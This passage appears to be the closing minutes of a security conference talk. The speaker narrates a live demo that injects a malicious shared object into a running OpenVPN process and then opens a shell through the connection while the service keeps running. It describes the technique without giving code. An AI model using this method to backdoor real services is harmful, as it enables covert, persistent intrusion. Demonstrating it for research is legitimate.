It has to be run as the same user as your target process: if you're targeting Apache and it's running as the apache user, it needs to run as apache. I'm doing it as root just because it's easier. We've just injected a shared object into OpenVPN. Now we'll cat the /proc/<pid>/maps file, and you can see that our malicious shared object is loaded. Now I'm going to connect to OpenVPN and type in shell. It didn't disconnect me; we now have a shell. And we can see that OpenVPN is still running, running as usual. So that is my talk. Thank you very much for coming. I really enjoyed speaking here.